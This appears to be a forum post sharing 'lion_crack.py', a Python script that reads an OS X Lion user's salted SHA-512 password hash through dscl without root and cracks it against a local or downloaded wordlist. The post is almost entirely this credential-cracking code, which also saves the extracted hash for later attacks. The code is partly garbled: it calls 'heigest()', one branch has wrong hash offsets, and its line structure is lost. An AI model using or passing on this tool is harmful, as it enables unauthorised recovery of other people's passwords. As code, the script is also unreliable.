Unhash SHA512 + 4-byte salt
Code:
########################################## #* OS X Lion 10.7 Password Cracker #* UID 0 NOT required #* #* Usage: #* python lion_crack.py [username] [dictionnary] #* ########################################### from subprocess import * import hashlib import os import urllib2 import sys from string import * link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file defaultuser = False username = "" def check(password): # Hash password and compare if not password.startswith("#!"): # Ignore comments guess = hashlib.sha512(salt_hex + password).heigest() print("Trying... " + password) if guess == hash: print("Cleartext password for user '"+username+"' is : "+password) exit(0) if len(sys.argv) < 2: print("No username given. Defaulting to current user.") defaultuser = True else: username = sys.argv[1] p = Popen("whoami", shell=True, stdout=PIPE) whoami = p.communicate()[0] if defaultuser: username = whoami.rstrip() p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE) dscl_out = p.communicate()[0] list = dscl_out.split("\n") for pos,item in enumerate(list): # extract digest if "dsAttrTypeNative:ShadowHashData" in item: digest = list[pos+1].replace(" ", "") if len(digest) == 262: # Out of box configuration salt = digest[56:64] hash = digest[64:192] elif len(digest) == 314: # SMB turned on print("SMB is on") salt = digest[104:112] hash = digest[112:240] elif len(digest) == 1436: # Lion Server salt = digest[176:184] hash = digest[176:304] elif len(digest) == 1492: # Lion Server with SMB salt = digest[224:232] hash = digest[232:360] print("SALT : " + salt) print("HASH : " + hash) salt_hex = chr(int(salt[0:2], 16)) + chr(int(salt[2:4], 16)) + chr(int(salt[4:6], 16)) + chr(int(salt[6:8], 16)) if len(sys.argv) == 3: # If dictionary file specified print("Reading from dictionary file '"+sys.argv[2]+"'.") check(whoami.rstrip()) passlist = open(sys.argv[2], "r") password = passlist.readline() while password: check(password.rstrip()) password = passlist.readline() passlist.close() else: # No dictionary file specified print("No dictionary file specified. Defaulting to hard coded link.") passlist = urllib2.urlopen(link) # Download dictionary file passwords = passlist.read().split("\n") print("\nPassword list successfully read") passwords.append(whoami.rstrip()) print("\nCracking...") for password in passwords: check(password) # Save hash for later print("\nSaving hash to "+username+".hash...") out = open(username+".hash", "w") out.write(salt+hash) out.close() print("\nPassword not found. Try another dictionary.\n")